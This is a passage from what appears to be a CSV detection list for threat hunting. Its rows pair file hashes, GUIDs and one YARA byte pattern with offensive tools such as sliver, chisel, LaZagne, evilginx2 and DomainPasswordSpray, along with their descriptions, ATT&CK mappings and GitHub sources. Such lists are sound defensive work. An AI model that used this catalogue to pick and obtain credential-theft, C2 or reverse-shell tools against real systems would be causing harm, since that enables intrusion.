tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c*",".{0,1000}41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92*",".{0,1000}4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49*",".{0,1000}418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b*",".{0,1000}418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235*",".{0,1000}41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387*",".{0,1000}41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42 3C 8B AC 10 88 00 00 00 44 8B 54 15 20 44 8B 5C 15 24 4C*",".{0,1000}42\s3C\s8B\sAC\s10\s88\s00\s00\s00\s44\s8B\s54\s15\s20\s44\s8B\s5C\s15\s24\s4C.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","#yara rule","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3*",".{0,1000}420e9c27a22ad9c6cb1535009bc23440b7a54fbef61d30e0702926e6a03502d3.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728*",".{0,1000}423fb953bce17ed5848e1fd48440846cb259a2981fb61906f94491d64e131728.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c*",".{0,1000}42528d08f25fcba2cb6088f4a1d810a1c1783ee3af573204094f81c2a4c0765c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7*",".{0,1000}42565c3d95ecec212407c937415035ad9beff85f000036ff05fd9c39022a57b7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2*",".{0,1000}42751e43f472016665ac6fcccaae068dbbacd836665b11b187c025e45da439d2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22*",".{0,1000}429be1a6cfaedaf84394b9c8364ccbfc353788f2332d6143b0131d48d39eac22.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446*",".{0,1000}42c8296e0f553026ef98c9c89a1a6a60613c990621b9f04cf925833eb0572446.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072*",".{0,1000}42d19694b284a82d02a8662edb4db86c22122ea981ca36aced94c4ba67fff072.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b*",".{0,1000}42d93b315b6016a420d76e3b99e46a1baa57636d30b26bc4c556a0c3b3d70a6b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208*",".{0,1000}42e504f3d9d9800c1c75ff6d8c5433d801e7148760cba709fa3bd5dd8e4a0208.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6*",".{0,1000}42e93d295e08ea6af4885814b8cf66d43a875be0ee5b8966b5685e3e5269efb6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e*",".{0,1000}4328364d7fbb9555b5602f2c980475917bc34f73e6839da366d52a277715c37e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6*",".{0,1000}433d59580b95a3e3b82364729aac65643385eb4500c46eae2aab1c0567df03e6.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c*",".{0,1000}4347d68bd769cf25fa1046b8c9c3f5f4c1c83ae6b96ac1d3ed4b8dce7647c22c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438*",".{0,1000}436b7f540f534a0ec1337cf82a76cb7727acda423132195f0c81560cdf75c438.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1*",".{0,1000}4370e110d8731b6b6fbb98d9ae2ffae6a3b00a8329b2700e86b15e1bd97166c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3*",".{0,1000}437f2e82e5fd2de01257379e1e155f380ad173c35f32a02eeedd1a06a262e8a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*438bf6db9eece197ef8d3e133a7e229086b5682d*",".{0,1000}438bf6db9eece197ef8d3e133a7e229086b5682d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250*",".{0,1000}438f9082ae1cd3bc27027e8d1a14adcc96768fe52dea5594e31487d01f0dd250.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f*",".{0,1000}43ac133ca47ed9916e78d39f8a3bd05bc8ef31f3925ccaa4b24e769f47e2f61f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257*",".{0,1000}43b5fbace7d714684822e05f4ceb05e77ca3dc638861003086a5ea96bd7b0257.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*",".{0,1000}43BB3C30\-39D7\-4B6B\-972E\-1E2B94D4D53A.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5*",".{0,1000}43bc3fe471a81b11c2e59cd0fd55630cee7860f8caad44fb8ee54d109e01a5e5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a*",".{0,1000}43c1a32158fa01f876c670e53c90f43ebdf4cf61f7b8cc683f06c0c76250bb1a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d*",".{0,1000}43da5889dce96d8f11dd09ab509217c13aad4a9cc51538633428aa9887b1039d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be*",".{0,1000}440fb40172430f771a7c289ebb8257988624fdd0a95f84d0b24432a18144b4be.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157*",".{0,1000}441ad151017dbc879fa10de0f4b090d296ec028cbdd5587bb72a62e521c21157.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7*",".{0,1000}441cb40ecc946bfb7d9ec0e7880f17f07b899adb176c6f40231aec2ab41ac1d7.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f*",".{0,1000}4420ccad05518f31e8960f7af1dd0d50e34331ff19fc618511cf91ac557e2f3f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478*",".{0,1000}44321a4dc67e158e93fd037ef197dddfc4e454cacfd87f13964032edcb4b3478.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*",".{0,1000}443D8CBF\-899C\-4C22\-B4F6\-B7AC202D4E37.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7*",".{0,1000}444bb9e867be655f6c5c89b8f6f1d991417f13eeb2e1838bb42c0ac9ee5f00f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce*",".{0,1000}446c06c2d90d1afb23e58a0185087888a5225a6d16aa3949648a80c47e2430ce.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a*",".{0,1000}4477af81ed3e1c76c637314311b3923f8155896ea2e18d5ab2fa6508f46d3b4a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91*",".{0,1000}44782077d86a1fd173b94e020c23dc511a58fe77e055116014c30f8ecc4ead91.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d*",".{0,1000}448a280cf39fcebb006e9a66c81b9d59e884f0ed16590ac19d976e44fab7907d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*449CE476-7B27-47F5-B09C-570788A2F261*",".{0,1000}449CE476\-7B27\-47F5\-B09C\-570788A2F261.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" 